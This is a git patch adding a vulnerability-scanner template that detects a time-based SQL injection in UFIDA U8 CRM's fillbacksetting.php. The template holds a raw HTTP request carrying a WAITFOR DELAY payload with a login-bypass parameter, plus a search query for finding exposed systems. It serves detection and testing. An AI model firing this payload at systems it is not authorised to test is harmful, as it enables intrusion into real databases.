From 9bcd81db2eca9d27368fb7a0e1ea78cc2c27ce12 Mon Sep 17 00:00:00 2001
From: Kazgangap <halilkirazkaya@yandex.com>
Date: Tue, 8 Oct 2024 18:23:45 +0300
Subject: [PATCH] add u8 tb sqli

---
 .../yonyou/yonyou-u8-crm-tb-sqli.yaml         | 31 +++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml

diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml
new file mode 100644
index 0000000000..5cd274d165
--- /dev/null
+++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml
@@ -0,0 +1,31 @@
+id: yonyou-u8-crm-tb-sqli
+
+info:
+  name: UFIDA U8 CRM fillbacksetting.php - Time Based Sql Injection
+  author: s4e-io
+  severity: high
+  description: |
+    UFIDA U8-CRM system /config/fillbacksetting.php contains an SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security.
+  reference:
+    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-CRM%E7%B3%BB%E7%BB%9Ffillbacksetting.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: title="用友U8CRM"
+  tags: yonyou,u8-crm,time-based-sqli
+
+http:
+  - raw:
+      - |
+        @timeout 20s
+        GET /config/fillbacksetting.php?DontCheckLogin=1&action=delete&id=-99;WAITFOR+DELAY+'0:0:6'-- HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: PHPSESSID=bgsesstimeout-;
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'contains(body, "success\":true")'
+          - 'status_code == 200'
+        condition: and